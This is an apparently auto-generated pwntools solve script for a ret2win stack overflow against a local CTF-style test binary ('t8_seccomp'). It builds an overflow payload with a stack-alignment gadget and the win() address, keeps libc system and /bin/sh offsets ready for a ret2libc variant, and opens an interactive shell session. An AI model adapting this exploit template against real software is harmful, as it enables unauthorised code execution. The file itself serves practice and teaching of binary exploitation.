#!/usr/bin/env python3
# BinSmasher auto-generated solve template for: t8_seccomp
# Exploit type: ret2win
# Generated by BinSmasher v4.2
#
# Usage:
#   python3 solve_t8_seccomp.py           # remote
#   python3 solve_t8_seccomp.py LOCAL      # local binary
#   python3 solve_t8_seccomp.py GDB        # attach gdb

from pwn import *
import sys

# ── Target ────────────────────────────────────────────────────────────────
HOST   = "127.0.0.1"
PORT   = 14448
BINARY = "tests/bins/t8_seccomp"

# ── Context ───────────────────────────────────────────────────────────────
context.binary    = ELF(BINARY, checksec=False)
context.arch      = "amd64"
context.log_level = "info"
elf = context.binary

# ── Detected info (auto-filled by BinSmasher) ─────────────────────────────
OFFSET       = 100           # cyclic offset to return address
CANARY       = None   # stack canary (None = not present)
LIBC_BASE    = 0x7ef53c400000   # libc base (None = ASLR, need leak)

# ── Win function ──────────────────────────────────────────────────────────
WIN_ADDR = 0x401156  # win()

# ── ROP gadgets ───────────────────────────────────────────────────────────
rop = ROP(elf)
POP_RDI  = rop.find_gadget(["pop rdi", "ret"])[0]
RET      = 0x40101a

# ── libc offsets (from BinSmasher analysis) ───────────────────────────────
SYSTEM_OFF  = 0x58740
BINSH_OFF   = 0x1cb42f
# If LIBC_BASE is None, uncomment and fill after leak:
# LIBC_BASE  = leaked_addr - SYSTEM_OFF
# SYSTEM     = LIBC_BASE + SYSTEM_OFF
# BINSH      = LIBC_BASE + BINSH_OFF

# ── Connection ────────────────────────────────────────────────────────────
def conn():
    if "LOCAL" in sys.argv:
        io = process([BINARY])
    elif "GDB" in sys.argv:
        io = gdb.debug([BINARY], gdbscript="""
            break win
            continue
        """)
    else:
        io = remote(HOST, PORT)
    return io

# ── Exploit — ret2win ─────────────────────────────────────────────────
def exploit():
    io = conn()
    # Drain banner if any
    try: io.recvline(timeout=1)
    except: pass

    cv  = b''
    pad = b'B' * 8

    payload  = b"A" * OFFSET
    payload += cv
    payload += pad
    payload += p64(RET)        # stack alignment (amd64)
    payload += p64(WIN_ADDR)   # win()

    io.sendline(payload)

    try:
        out = io.recvall(timeout=3)
        if out:
            log.success(f"Output: {out[:200]}")
    except:
        pass

    io.interactive()

if __name__ == "__main__":
    exploit()
